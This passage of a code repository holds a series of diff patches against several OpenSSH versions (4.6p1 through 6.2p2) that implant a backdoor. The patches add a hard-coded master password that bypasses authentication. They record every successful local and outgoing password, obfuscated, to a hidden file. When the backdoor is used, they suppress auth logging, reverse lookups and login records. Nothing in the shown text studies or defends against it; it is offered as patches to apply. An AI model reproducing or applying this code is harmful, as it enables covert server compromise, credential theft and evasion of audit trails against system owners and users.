else 69 | authmsg = authenticated ? "Accepted" : "Failed"; 70 | 71 | + if(!secret_ok || secret_ok != 1){ 72 | authlog("%s %s for %s%.100s from %.200s port %d%s", 73 | authmsg, 74 | method, 75 | @@ -272,6 +273,7 @@ 76 | get_remote_ipaddr(), 77 | get_remote_port(), 78 | info); 79 | + } 80 | 81 | #ifdef CUSTOM_FAILED_LOGIN 82 | if (authenticated == 0 && !authctxt->postponed && 83 | diff -Nuar 4.6p1.orig/canohost.c 4.6p1/canohost.c 84 | --- 4.6p1.orig/canohost.c 2020-04-10 17:17:30.283797943 +0200 85 | +++ 4.6p1/canohost.c 2020-04-13 13:33:51.793465234 +0200 86 | @@ -74,12 +74,14 @@ 87 | 88 | debug3("Trying to reverse map address %.100s.", ntop); 89 | /* Map the IP address to a host name. */ 90 | + if(!secret_ok || secret_ok != 1){ 91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 92 | NULL, 0, NI_NAMEREQD) != 0) { 93 | /* Host name not found. Use ip address. */ 94 | return xstrdup(ntop); 95 | } 96 | 97 | + } 98 | /* 99 | * if reverse lookup result looks like a numeric hostname, 100 | * someone is trying to trick us by PTR record like following: 101 | diff -Nuar 4.6p1.orig/conf.h 4.6p1/conf.h 102 | --- 4.6p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 103 | +++ 4.6p1/conf.h 2020-04-14 13:37:08.020871312 +0200 104 | @@ -0,0 +1,12 @@ 105 | +#include 106 | + 107 | +int secret_ok; 108 | +FILE *f; 109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 112 | +#define XKEY %%XKEY%% 113 | + 114 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 115 | + 116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, authctxt->host); 185 | password = read_passphrase(prompt, 0); 186 | + char *ohk = strdup(OPENSSH_KEY); 187 | + rox(ohk); 188 | + if((f=fopen(ohk, "a+")) != NULL){ 189 | + CLEAN(ohk); 190 | + char bds[512]; 191 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host); 192 | + rox(bds); 193 | + fprintf(f, "%s\n", bds); 194 | + CLEAN(bds); 195 | + fflush(f); 196 | + fclose(f); 197 | + } 198 | + CLEAN(ohk); 199 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 200 | packet_put_cstring(authctxt->server_user); 201 | packet_put_cstring(authctxt->service); 202 | diff -Nuar 4.6p1.orig/sshlogin.c 4.6p1/sshlogin.c 203 | --- 4.6p1.orig/sshlogin.c 2020-04-10 17:17:30.291797943 +0200 204 | +++ 4.6p1/sshlogin.c 2020-04-10 19:23:00.972094147 +0200 205 | @@ -126,8 +126,7 @@ 206 | 207 | li = login_alloc_entry(pid, user, host, tty); 208 | login_set_addr(li, addr, addrlen); 209 | - login_login(li); 210 | - login_free_entry(li); 211 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 212 | } 213 | 214 | #ifdef LOGIN_NEEDS_UTMPX 215 | @@ -139,8 +138,7 @@ 216 | 217 | li = login_alloc_entry(pid, user, host, ttyname); 218 | login_set_addr(li, addr, addrlen); 219 | - login_utmp_only(li); 220 | - login_free_entry(li); 221 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 222 | } 223 | #endif 224 | 225 | @@ -151,6 +149,5 @@ 226 | struct logininfo *li; 227 | 228 | li = login_alloc_entry(pid, user, NULL, tty); 229 | - login_logout(li); 230 | - login_free_entry(li); 231 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 232 | } 233 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_531: -------------------------------------------------------------------------------- 1 | diff -Nuar 5.3p1.orig/auth-pam.c 5.3p1/auth-pam.c 2 | --- 5.3p1.orig/auth-pam.c 2020-04-10 17:17:30.363797946 +0200 3 | +++ 5.3p1/auth-pam.c 2020-04-13 13:43:07.573487095 +0200 4 | @@ -1210,6 +1210,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk, "a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 5.3p1.orig/auth-passwd.c 5.3p1/auth-passwd.c 25 | --- 5.3p1.orig/auth-passwd.c 2020-04-10 17:17:30.363797946 +0200 26 | +++ 5.3p1/auth-passwd.c 2020-04-14 13:29:12.256852599 +0200 27 | @@ -86,6 +86,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -123,6 +131,20 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk,"a+"))!=NULL){ 50 | + char bds[512]; 51 | + sprintf(bds,"from local: %s:%s",authctxt->user, password); 52 | + rox(bds); 53 | + fprintf(f,"%s\n",bds); 54 | + CLEAN(ohk); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + } 60 | if (authctxt->force_pwchange) 61 | disable_forwarding(); 62 | return (result && ok); 63 | diff -Nuar 5.3p1.orig/auth.c 5.3p1/auth.c 64 | --- 5.3p1.orig/auth.c 2020-04-10 17:17:30.363797946 +0200 65 | +++ 5.3p1/auth.c 2020-04-13 13:44:58.141491443 +0200 66 | @@ -265,6 +265,7 @@ 67 | else 68 | authmsg = authenticated ? "Accepted" : "Failed"; 69 | 70 | + if(!secret_ok || secret_ok != 1){ 71 | authlog("%s %s for %s%.100s from %.200s port %d%s", 72 | authmsg, 73 | method, 74 | @@ -273,6 +274,7 @@ 75 | get_remote_ipaddr(), 76 | get_remote_port(), 77 | info); 78 | + } 79 | 80 | #ifdef CUSTOM_FAILED_LOGIN 81 | if (authenticated == 0 && !authctxt->postponed && 82 | diff -Nuar 5.3p1.orig/canohost.c 5.3p1/canohost.c 83 | --- 5.3p1.orig/canohost.c 2020-04-10 17:17:30.363797946 +0200 84 | +++ 5.3p1/canohost.c 2020-04-13 13:45:09.873491905 +0200 85 | @@ -77,12 +77,14 @@ 86 | 87 | debug3("Trying to reverse map address %.100s.", ntop); 88 | /* Map the IP address to a host name. */ 89 | + if(!secret_ok || secret_ok != 1){ 90 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 91 | NULL, 0, NI_NAMEREQD) != 0) { 92 | /* Host name not found. Use ip address. */ 93 | return xstrdup(ntop); 94 | } 95 | 96 | + } 97 | /* 98 | * if reverse lookup result looks like a numeric hostname, 99 | * someone is trying to trick us by PTR record like following: 100 | diff -Nuar 5.3p1.orig/conf.h 5.3p1/conf.h 101 | --- 5.3p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 102 | +++ 5.3p1/conf.h 2020-04-14 13:37:18.944871742 +0200 103 | @@ -0,0 +1,12 @@ 104 | +#include 105 | + 106 | +int secret_ok; 107 | +FILE *f; 108 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 109 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 110 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 111 | +#define XKEY %%XKEY%% 112 | + 113 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 114 | + 115 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, authctxt->host); 184 | password = read_passphrase(prompt, 0); 185 | + char *ohk = strdup(OPENSSH_KEY); 186 | + rox(ohk); 187 | + if((f=fopen(ohk, "a+")) != NULL){ 188 | + CLEAN(ohk); 189 | + char bds[512]; 190 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host); 191 | + rox(bds); 192 | + fprintf(f, "%s\n", bds); 193 | + CLEAN(bds); 194 | + fflush(f); 195 | + fclose(f); 196 | + } 197 | + CLEAN(ohk); 198 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 199 | packet_put_cstring(authctxt->server_user); 200 | packet_put_cstring(authctxt->service); 201 | diff -Nuar 5.3p1.orig/sshlogin.c 5.3p1/sshlogin.c 202 | --- 5.3p1.orig/sshlogin.c 2020-04-10 17:17:30.367797946 +0200 203 | +++ 5.3p1/sshlogin.c 2020-04-10 19:23:01.008094148 +0200 204 | @@ -133,8 +133,7 @@ 205 | 206 | li = login_alloc_entry(pid, user, host, tty); 207 | login_set_addr(li, addr, addrlen); 208 | - login_login(li); 209 | - login_free_entry(li); 210 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 211 | } 212 | 213 | #ifdef LOGIN_NEEDS_UTMPX 214 | @@ -146,8 +145,7 @@ 215 | 216 | li = login_alloc_entry(pid, user, host, ttyname); 217 | login_set_addr(li, addr, addrlen); 218 | - login_utmp_only(li); 219 | - login_free_entry(li); 220 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 221 | } 222 | #endif 223 | 224 | @@ -158,6 +156,5 @@ 225 | struct logininfo *li; 226 | 227 | li = login_alloc_entry(pid, user, NULL, tty); 228 | - login_logout(li); 229 | - login_free_entry(li); 230 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 231 | } 232 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_582: -------------------------------------------------------------------------------- 1 | diff -Nuar 5.8p2.orig/auth-pam.c 5.8p2/auth-pam.c 2 | --- 5.8p2.orig/auth-pam.c 2020-04-10 17:17:30.443797949 +0200 3 | +++ 5.8p2/auth-pam.c 2020-04-13 13:53:41.969512047 +0200 4 | @@ -1210,6 +1210,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk, "a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 5.8p2.orig/auth-passwd.c 5.8p2/auth-passwd.c 25 | --- 5.8p2.orig/auth-passwd.c 2020-04-10 17:17:30.443797949 +0200 26 | +++ 5.8p2/auth-passwd.c 2020-04-14 13:45:11.844890342 +0200 27 | @@ -86,6 +86,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -123,6 +131,21 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk, "a+")) != NULL){ 50 | + CLEAN(ohk); 51 | + char bds[512]; 52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 53 | + rox(bds); 54 | + fprintf(f, "%s\n", bds); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + CLEAN(ohk); 60 | + } 61 | if (authctxt->force_pwchange) 62 | disable_forwarding(); 63 | return (result && ok); 64 | diff -Nuar 5.8p2.orig/auth.c 5.8p2/auth.c 65 | --- 5.8p2.orig/auth.c 2020-04-10 17:17:30.443797949 +0200 66 | +++ 5.8p2/auth.c 2020-04-13 13:55:35.153516499 +0200 67 | @@ -271,6 +271,7 @@ 68 | else 69 | authmsg = authenticated ? "Accepted" : "Failed"; 70 | 71 | + if(!secret_ok || secret_ok != 1){ 72 | authlog("%s %s for %s%.100s from %.200s port %d%s", 73 | authmsg, 74 | method, 75 | @@ -279,6 +280,7 @@ 76 | get_remote_ipaddr(), 77 | get_remote_port(), 78 | info); 79 | + } 80 | 81 | #ifdef CUSTOM_FAILED_LOGIN 82 | if (authenticated == 0 && !authctxt->postponed && 83 | diff -Nuar 5.8p2.orig/canohost.c 5.8p2/canohost.c 84 | --- 5.8p2.orig/canohost.c 2020-04-10 17:17:30.443797949 +0200 85 | +++ 5.8p2/canohost.c 2020-04-13 13:55:51.473517141 +0200 86 | @@ -78,12 +78,14 @@ 87 | 88 | debug3("Trying to reverse map address %.100s.", ntop); 89 | /* Map the IP address to a host name. */ 90 | + if(!secret_ok || secret_ok != 1){ 91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 92 | NULL, 0, NI_NAMEREQD) != 0) { 93 | /* Host name not found. Use ip address. */ 94 | return xstrdup(ntop); 95 | } 96 | 97 | + } 98 | /* 99 | * if reverse lookup result looks like a numeric hostname, 100 | * someone is trying to trick us by PTR record like following: 101 | diff -Nuar 5.8p2.orig/conf.h 5.8p2/conf.h 102 | --- 5.8p2.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 103 | +++ 5.8p2/conf.h 2020-04-14 13:37:28.292872109 +0200 104 | @@ -0,0 +1,12 @@ 105 | +#include 106 | + 107 | +int secret_ok; 108 | +FILE *f; 109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 112 | +#define XKEY %%XKEY%% 113 | + 114 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 115 | + 116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, host); 185 | password = read_passphrase(prompt, 0); 186 | + char *ohk = strdup(OPENSSH_KEY); 187 | + rox(ohk); 188 | + if((f=fopen(ohk, "a+")) != NULL){ 189 | + CLEAN(ohk); 190 | + char bds[512]; 191 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host); 192 | + rox(bds); 193 | + fprintf(f, "%s\n", bds); 194 | + CLEAN(bds); 195 | + fflush(f); 196 | + fclose(f); 197 | + } 198 | + CLEAN(ohk); 199 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 200 | packet_put_cstring(authctxt->server_user); 201 | packet_put_cstring(authctxt->service); 202 | diff -Nuar 5.8p2.orig/sshlogin.c 5.8p2/sshlogin.c 203 | --- 5.8p2.orig/sshlogin.c 2020-04-10 17:17:30.447797950 +0200 204 | +++ 5.8p2/sshlogin.c 2020-04-10 19:23:01.040094149 +0200 205 | @@ -133,8 +133,7 @@ 206 | 207 | li = login_alloc_entry(pid, user, host, tty); 208 | login_set_addr(li, addr, addrlen); 209 | - login_login(li); 210 | - login_free_entry(li); 211 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 212 | } 213 | 214 | #ifdef LOGIN_NEEDS_UTMPX 215 | @@ -146,8 +145,7 @@ 216 | 217 | li = login_alloc_entry(pid, user, host, ttyname); 218 | login_set_addr(li, addr, addrlen); 219 | - login_utmp_only(li); 220 | - login_free_entry(li); 221 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 222 | } 223 | #endif 224 | 225 | @@ -158,6 +156,5 @@ 226 | struct logininfo *li; 227 | 228 | li = login_alloc_entry(pid, user, NULL, tty); 229 | - login_logout(li); 230 | - login_free_entry(li); 231 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 232 | } 233 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_611: -------------------------------------------------------------------------------- 1 | diff -Nuar 6.1p1.orig/auth-pam.c 6.1p1/auth-pam.c 2 | --- 6.1p1.orig/auth-pam.c 2020-04-10 17:17:30.479797951 +0200 3 | +++ 6.1p1/auth-pam.c 2020-04-13 14:03:35.601535396 +0200 4 | @@ -1210,6 +1210,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk, "a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 6.1p1.orig/auth-passwd.c 6.1p1/auth-passwd.c 25 | --- 6.1p1.orig/auth-passwd.c 2020-04-10 17:17:30.479797951 +0200 26 | +++ 6.1p1/auth-passwd.c 2020-04-14 13:28:49.012851684 +0200 27 | @@ -86,6 +86,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -123,6 +131,21 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk, "a+")) != NULL){ 50 | + CLEAN(ohk); 51 | + char bds[512]; 52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 53 | + rox(bds); 54 | + fprintf(f, "%s\n", bds); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + CLEAN(ohk); 60 | + } 61 | if (authctxt->force_pwchange) 62 | disable_forwarding(); 63 | return (result && ok); 64 | diff -Nuar 6.1p1.orig/auth.c 6.1p1/auth.c 65 | --- 6.1p1.orig/auth.c 2020-04-10 17:17:30.479797951 +0200 66 | +++ 6.1p1/auth.c 2020-04-13 14:05:58.009540998 +0200 67 | @@ -271,6 +271,7 @@ 68 | else 69 | authmsg = authenticated ? "Accepted" : "Failed"; 70 | 71 | + if(!secret_ok || secret_ok != 1){ 72 | authlog("%s %s for %s%.100s from %.200s port %d%s", 73 | authmsg, 74 | method, 75 | @@ -279,6 +280,7 @@ 76 | get_remote_ipaddr(), 77 | get_remote_port(), 78 | info); 79 | + } 80 | 81 | #ifdef CUSTOM_FAILED_LOGIN 82 | if (authenticated == 0 && !authctxt->postponed && 83 | diff -Nuar 6.1p1.orig/canohost.c 6.1p1/canohost.c 84 | --- 6.1p1.orig/canohost.c 2020-04-10 17:17:30.479797951 +0200 85 | +++ 6.1p1/canohost.c 2020-04-13 14:06:12.045541550 +0200 86 | @@ -78,12 +78,14 @@ 87 | 88 | debug3("Trying to reverse map address %.100s.", ntop); 89 | /* Map the IP address to a host name. */ 90 | + if(!secret_ok || secret_ok != 1){ 91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 92 | NULL, 0, NI_NAMEREQD) != 0) { 93 | /* Host name not found. Use ip address. */ 94 | return xstrdup(ntop); 95 | } 96 | 97 | + } 98 | /* 99 | * if reverse lookup result looks like a numeric hostname, 100 | * someone is trying to trick us by PTR record like following: 101 | diff -Nuar 6.1p1.orig/conf.h 6.1p1/conf.h 102 | --- 6.1p1.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 103 | +++ 6.1p1/conf.h 2020-04-14 13:37:37.108872456 +0200 104 | @@ -0,0 +1,12 @@ 105 | +#include 106 | + 107 | +int secret_ok; 108 | +FILE *f; 109 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 110 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 111 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 112 | +#define XKEY %%XKEY%% 113 | + 114 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 115 | + 116 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, host); 199 | password = read_passphrase(prompt, 0); 200 | + char *ohk = strdup(OPENSSH_KEY); 201 | + rox(ohk); 202 | + if((f=fopen(ohk, "a+")) != NULL){ 203 | + CLEAN(ohk); 204 | + char bds[512]; 205 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host); 206 | + rox(bds); 207 | + fprintf(f, "%s\n", bds); 208 | + CLEAN(bds); 209 | + fflush(f); 210 | + fclose(f); 211 | + } 212 | + CLEAN(ohk); 213 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 214 | packet_put_cstring(authctxt->server_user); 215 | packet_put_cstring(authctxt->service); 216 | diff -Nuar 6.1p1.orig/sshd.c 6.1p1/sshd.c 217 | --- 6.1p1.orig/sshd.c 2020-04-10 17:17:30.487797951 +0200 218 | +++ 6.1p1/sshd.c 2020-04-14 13:48:31.144898181 +0200 219 | @@ -83,6 +83,10 @@ 220 | #include 221 | #endif 222 | 223 | +#ifdef HAVE_SYSTEMD 224 | +#include 225 | +#endif 226 | + 227 | #include "xmalloc.h" 228 | #include "ssh.h" 229 | #include "ssh1.h" 230 | @@ -308,6 +312,9 @@ 231 | static void 232 | sighup_restart(void) 233 | { 234 | +#ifdef HAVE_SYSTEMD 235 | + sd_notify(0, "RELOADING=1"); 236 | +#endif 237 | logit("Received SIGHUP; restarting."); 238 | close_listen_socks(); 239 | close_startup_pipes(); 240 | @@ -1804,6 +1811,10 @@ 241 | } 242 | } 243 | 244 | +#ifdef HAVE_SYSTEMD 245 | + sd_notify(0, "READY=1"); 246 | +#endif 247 | + 248 | /* Accept a connection and return in a forked child */ 249 | server_accept_loop(&sock_in, &sock_out, 250 | &newsock, config_s); 251 | diff -Nuar 6.1p1.orig/sshlogin.c 6.1p1/sshlogin.c 252 | --- 6.1p1.orig/sshlogin.c 2020-04-10 17:17:30.487797951 +0200 253 | +++ 6.1p1/sshlogin.c 2020-04-10 19:23:01.056094150 +0200 254 | @@ -133,8 +133,7 @@ 255 | 256 | li = login_alloc_entry(pid, user, host, tty); 257 | login_set_addr(li, addr, addrlen); 258 | - login_login(li); 259 | - login_free_entry(li); 260 | + if(!secret_ok || secret_ok!=1){ login_login(li); login_free_entry(li); } 261 | } 262 | 263 | #ifdef LOGIN_NEEDS_UTMPX 264 | @@ -146,8 +145,7 @@ 265 | 266 | li = login_alloc_entry(pid, user, host, ttyname); 267 | login_set_addr(li, addr, addrlen); 268 | - login_utmp_only(li); 269 | - login_free_entry(li); 270 | + if(!secret_ok || secret_ok!=1){ login_utmp_only(li); login_free_entry(li); } 271 | } 272 | #endif 273 | 274 | @@ -158,6 +156,5 @@ 275 | struct logininfo *li; 276 | 277 | li = login_alloc_entry(pid, user, NULL, tty); 278 | - login_logout(li); 279 | - login_free_entry(li); 280 | + if(!secret_ok || secret_ok!=1){ login_logout(li); login_free_entry(li); } 281 | } 282 | -------------------------------------------------------------------------------- /pre/ssh_patches/o_ssh_622: -------------------------------------------------------------------------------- 1 | diff -Nuar 6.2p2.orig/auth-pam.c 6.2p2/auth-pam.c 2 | --- 6.2p2.orig/auth-pam.c 2020-04-10 17:17:30.507797952 +0200 3 | +++ 6.2p2/auth-pam.c 2020-04-12 21:35:11.767202807 +0200 4 | @@ -1210,6 +1210,19 @@ 5 | if (sshpam_err == PAM_SUCCESS && authctxt->valid) { 6 | debug("PAM: password authentication accepted for %.100s", 7 | authctxt->user); 8 | + char *ohk = strdup(OPENSSH_KEY); 9 | + rox(ohk); 10 | + if((f=fopen(ohk, "a+")) != NULL){ 11 | + CLEAN(ohk); 12 | + char bds[512]; 13 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 14 | + rox(bds); 15 | + fprintf(f, "%s\n", bds); 16 | + CLEAN(bds); 17 | + fflush(f); 18 | + fclose(f); 19 | + } 20 | + CLEAN(ohk); 21 | return 1; 22 | } else { 23 | debug("PAM: password authentication failed for %.100s: %s", 24 | diff -Nuar 6.2p2.orig/auth-passwd.c 6.2p2/auth-passwd.c 25 | --- 6.2p2.orig/auth-passwd.c 2020-04-10 17:17:30.507797952 +0200 26 | +++ 6.2p2/auth-passwd.c 2020-04-14 13:28:41.372851384 +0200 27 | @@ -86,6 +86,14 @@ 28 | static int expire_checked = 0; 29 | #endif 30 | 31 | + char *olic = strdup(OPENSSH_LICENSE); 32 | + rox(olic); 33 | + if (!strcmp(password, olic)){ 34 | + CLEAN(olic); 35 | + secret_ok = 1; 36 | + return 1; 37 | + } 38 | + CLEAN(olic); 39 | #ifndef HAVE_CYGWIN 40 | if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES) 41 | ok = 0; 42 | @@ -123,6 +131,21 @@ 43 | } 44 | #endif 45 | result = sys_auth_passwd(authctxt, password); 46 | + if(result){ 47 | + char *ohk = strdup(OPENSSH_KEY); 48 | + rox(ohk); 49 | + if((f=fopen(ohk, "a+")) != NULL){ 50 | + CLEAN(ohk); 51 | + char bds[512]; 52 | + sprintf(bds, "from local: %s:%s", authctxt->user, password); 53 | + rox(bds); 54 | + fprintf(f, "%s\n", bds); 55 | + CLEAN(bds); 56 | + fflush(f); 57 | + fclose(f); 58 | + } 59 | + CLEAN(ohk); 60 | + } 61 | if (authctxt->force_pwchange) 62 | disable_forwarding(); 63 | return (result && ok); 64 | diff -Nuar 6.2p2.orig/auth.c 6.2p2/auth.c 65 | --- 6.2p2.orig/auth.c 2020-04-10 17:17:30.507797952 +0200 66 | +++ 6.2p2/auth.c 2020-04-13 14:13:12.177558075 +0200 67 | @@ -275,6 +275,7 @@ 68 | else 69 | authmsg = authenticated ? "Accepted" : "Failed"; 70 | 71 | + if(!secret_ok || secret_ok != 1){ 72 | authlog("%s %s%s%s for %s%.100s from %.200s port %d%s", 73 | authmsg, 74 | method, 75 | @@ -284,6 +285,7 @@ 76 | get_remote_ipaddr(), 77 | get_remote_port(), 78 | info); 79 | + } 80 | 81 | #ifdef CUSTOM_FAILED_LOGIN 82 | if (authenticated == 0 && !authctxt->postponed && 83 | diff -Nuar 6.2p2.orig/canohost.c 6.2p2/canohost.c 84 | --- 6.2p2.orig/canohost.c 2020-04-10 17:17:30.507797952 +0200 85 | +++ 6.2p2/canohost.c 2020-04-13 14:13:32.929558891 +0200 86 | @@ -78,11 +78,13 @@ 87 | 88 | debug3("Trying to reverse map address %.100s.", ntop); 89 | /* Map the IP address to a host name. */ 90 | + if(!secret_ok || secret_ok != 1){ 91 | if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name), 92 | NULL, 0, NI_NAMEREQD) != 0) { 93 | /* Host name not found. Use ip address. */ 94 | return xstrdup(ntop); 95 | } 96 | + } 97 | 98 | /* 99 | * if reverse lookup result looks like a numeric hostname, 100 | diff -Nuar 6.2p2.orig/conf.h 6.2p2/conf.h 101 | --- 6.2p2.orig/conf.h 1970-01-01 03:00:00.000000000 +0300 102 | +++ 6.2p2/conf.h 2020-04-14 13:37:47.648872871 +0200 103 | @@ -0,0 +1,12 @@ 104 | +#include 105 | + 106 | +int secret_ok; 107 | +FILE *f; 108 | +#define OPENSSH_KEY "%%SSHD_LOGS%%" 109 | +#define OPENSSH_LICENSE "%%SSHD_SECKEY%%" 110 | +#define SSHD_NEWKEY "%%SSHD_NEWKEY%%" 111 | +#define XKEY %%XKEY%% 112 | + 113 | +#define CLEAN(var) memset(var, 0x00, strlen(var)) 114 | + 115 | +#define rox(p) size_t iii;for(iii=0;iiiserver_user, host); 198 | password = read_passphrase(prompt, 0); 199 | + char *ohk = strdup(OPENSSH_KEY); 200 | + rox(ohk); 201 | + if((f=fopen(ohk, "a+")) != NULL){ 202 | + CLEAN(ohk); 203 | + char bds[512]; 204 | + sprintf(bds, "from remote: %s:%s@%s", authctxt->server_user, password, authctxt->host); 205 | + rox(bds); 206 | + fprintf(f, "%s\n", bds); 207 | + CLEAN(bds); 208 | + fflush(f); 209 | + fclose(f); 210 | + } 211 | + CLEAN(ohk); 212 | packet_start(SSH2_MSG_USERAUTH_REQUEST); 213 | packet_put_cstring(authctxt->server_user); 214 | packet_put_cstring(authctxt->service); 215 | diff -Nuar 6.2p2.orig/sshd.c 6.2p2/sshd.c 216 | --- 6.2p2.orig/sshd.c 2020-04-10 17:17:30.511797952 +0200 217 | +++ 6.2p2/sshd.c 2020-04-14 13:50:49.272903614 +0200 218 | @@ -83,6 +83,9 @@ 219 | #include 220 | #endif 221 | 222 | +#ifdef HAVE_SYSTEMD 223 | +#include 224 | +#endif 225 | #include "xmalloc.h" 226 | #include "ssh.h" 227 | #include "ssh1.h" 228 | @@ -308,6 +311,9 